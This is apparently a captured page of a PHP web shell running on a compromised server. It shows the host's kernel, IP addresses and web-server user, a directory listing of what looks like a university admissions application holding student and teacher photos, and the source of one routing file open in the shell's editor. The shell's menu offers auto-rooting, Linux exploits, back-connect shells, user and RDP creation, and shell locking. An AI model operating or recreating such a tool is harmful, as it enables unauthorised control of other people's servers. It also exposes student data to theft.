Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.218.250.241
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
acu /
[ HOME SHELL ]
Name
Size
Permission
Action
ExcelWriterXML
[ DIR ]
drwxr-xr-x
Excel_Writer
[ DIR ]
drwxr-xr-x
Excel_reader
[ DIR ]
drwxr-xr-x
JQGrid3.5
[ DIR ]
drwxr-xr-x
Open_Sans
[ DIR ]
drwxr-xr-x
PHPExcel
[ DIR ]
drwxr-xr-x
Report_details
[ DIR ]
drwxr-xr-x
adm
[ DIR ]
drwxr-xr-x
admupload
[ DIR ]
drwxrwxrwx
certificates
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxr-xr-x
css_11092018
[ DIR ]
drwxr-xr-x
custom_js
[ DIR ]
drwxr-xr-x
custom_src
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
docverify
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
gradlist
[ DIR ]
drwxr-xr-x
grid
[ DIR ]
drwxr-xr-x
grid_display_files
[ DIR ]
drwxr-xr-x
gridsrch
[ DIR ]
drwxr-xr-x
halltickets
[ DIR ]
drwxrwxrwx
halltickets_old
[ DIR ]
drwxr-xr-x
halltickets_wait
[ DIR ]
drwxr-xr-x
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
imported_files
[ DIR ]
drwxrwxrwx
jqGrid4
[ DIR ]
drwxr-xr-x
jqgridn3.5
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
maya-pdf
[ DIR ]
drwxr-xr-x
popups
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxr-xr-x
tarka_pdf_latest
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
teacher_photos
[ DIR ]
drwxrwxrwx
tmpphotos
[ DIR ]
drwxrwxrwx
upload
[ DIR ]
drwxrwxrwx
MainPage.html
17.79
KB
-rwxr-xr-x
MainPage_11092018.html
11.64
KB
-rwxr-xr-x
MainPagepopup.html
7.05
KB
-rwxr-xr-x
MainPagepopup_11092018.html
7.05
KB
-rwxr-xr-x
Thumbs.db
464
KB
-rwxr-xr-x
admStatistics.php
5.12
KB
-rwxr-xr-x
admcollsum.php
4.45
KB
-rwxr-xr-x
admcollsum_college.php
5
KB
-rwxr-xr-x
admdatasummary.html
2.4
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
1.09
KB
-rwxr-xr-x
collegeInfoPopup.html
4.25
KB
-rwxr-xr-x
docverify.php
818
B
-rwxr-xr-x
homepage.html
3.35
KB
-rwxr-xr-x
homepage_11092018.html
3.05
KB
-rwxr-xr-x
index.php
83
B
-rwxr-xr-x
index_11092018.html
7.27
KB
-rwxr-xr-x
index_stop.html
6.18
KB
-rwxr-xr-x
indexlogin.html
5.99
KB
-rwxr-xr-x
indexlogin_11092018.html
5.74
KB
-rwxr-xr-x
krvw_oasis__2020-06-29.zip
322
B
-rwxr-xr-x
krvw_oasis__2020-07-06.zip
322
B
-rwxr-xr-x
krvw_oasis__2020-08-10.zip
322
B
-rwxr-xr-x
kusPhdAdm.js
29.03
KB
-rwxr-xr-x
mcverifydet.php
14.83
KB
-rwxr-xr-x
mregistry.php
3.76
KB
-rwxr-xr-x
mverifytranscript.php
14.62
KB
-rwxr-xr-x
new.gif
197
B
-rwxr-xr-x
photoupload.php
9.28
KB
-rwxr-xr-x
student.php
11.45
KB
-rwxr-xr-x
verification.php
2.68
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mregistry.php
<?php session_start(); #............................................................................. # Register Syntax: # Param #1 - Action name (user friendly) # Param #2 - mapping to internal function # string delimited with "." # [0] - module name (aka .php file) - with relative source paths from the app base path # [1] - function name to be executed # [2] - comments/description about the Action # All the actions defined here are executed by CRequestBroker::ExecuteAction #............................................................................. //////KUS PHD ADDMISSION\\\\\\ CRequestBroker::RegisterAction("savephdApplication", "src/kusphdadm.saveApplication"); CRequestBroker::RegisterAction("rePrintApplication", "src/kusphdadm.rePrintApplication"); CRequestBroker::RegisterAction("printApplication", "src/report_bulk_applications.printApplication"); CRequestBroker::RegisterAction("getstudentdetails", "src/student.getstudentdetails"); CRequestBroker::RegisterAction("submitquery", "src/student.submitquery"); //////RE RIGISTRATION\\\\\\\ CRequestBroker::RegisterAction("getRerigistrationDetails", "src/re_rigistration.getRerigistrationDetails"); CRequestBroker::RegisterAction("getsubjectsforreregistration", "src/re_rigistration.getsubjectsforreregistration"); CRequestBroker::RegisterAction("saveReRigistrationDetails", "src/saveRerigistration.saveReRigistrationDetails"); CRequestBroker::RegisterAction("saveReRigistrationPersonal", "src/saveRerigistration.saveReRigistrationPersonal"); CRequestBroker::RegisterAction("getcombinationdetailsdetails", "src/student.getcombinationdetailsdetails"); CRequestBroker::RegisterAction("loadeditSubjectdet", "src/student.loadeditSubjectdet"); CRequestBroker::RegisterAction("getdropdownmenuvalues", "src/subfeedetl.getdropdownmenuvalues"); CRequestBroker::RegisterAction("getsubjectdet", "src/subfeedetl.getsubjectdet"); CRequestBroker::RegisterAction("SaveSubjectDetails", "src/subfeedetl.SaveSubjectDetails"); CRequestBroker::RegisterAction("getfeedetl", "src/subfeedetl.getfeedetl"); CRequestBroker::RegisterAction("saveVerificationDetails", "src/subfeedetl.saveVerificationDetails"); CRequestBroker::RegisterAction("getcmsdropdownmenuvalues", "src/student.getcmsdropdownmenuvalues"); CRequestBroker::RegisterAction("getdegreedetails", "src/student.getdegreedetails"); CRequestBroker::RegisterAction("uploaddcoument", "src/student.uploaddcoument"); CRequestBroker::RegisterAction("uploaddetails", "src/student.uploaddetails"); CRequestBroker::RegisterAction("uploadeditdetails", "src/student.uploadeditdetails"); CRequestBroker::RegisterAction("UploadEmployeeDocuments", "src/student.UploadEmployeeDocuments"); CRequestBroker::RegisterAction("loadSubjectdet", "src/student.loadSubjectdet"); CRequestBroker::RegisterAction("SaveApplicationDetails", "src/student.SaveApplicationDetails"); CRequestBroker::RegisterAction("saveDetails", "src/saveApplication.saveDetails"); CRequestBroker::RegisterAction("ValidatePaymentApplicationData", "src/student.ValidatePaymentApplicationData"); CRequestBroker::RegisterAction("ValidatePrintCertificateApplicationData", "src/student.ValidatePrintCertificateApplicationData"); CRequestBroker::RegisterAction("ValidateApplicationstatus", "src/student.ValidateApplicationstatus"); CRequestBroker::RegisterAction("getboarddetails", "src/student.getboarddetails"); CRequestBroker::RegisterAction("printapplicationfrom", "src/reportapplicationform.printapplicationfrom"); CRequestBroker::RegisterAction("getserviceagenciesfee", "src/student.getserviceagenciesfee"); CRequestBroker::RegisterAction("PrintApplicationFormSBM", "src/applicationFormReportSBM.PrintApplicationFormSBM"); CRequestBroker::RegisterAction("getreprint", "src/saveApplication.getreprint"); ?>
Close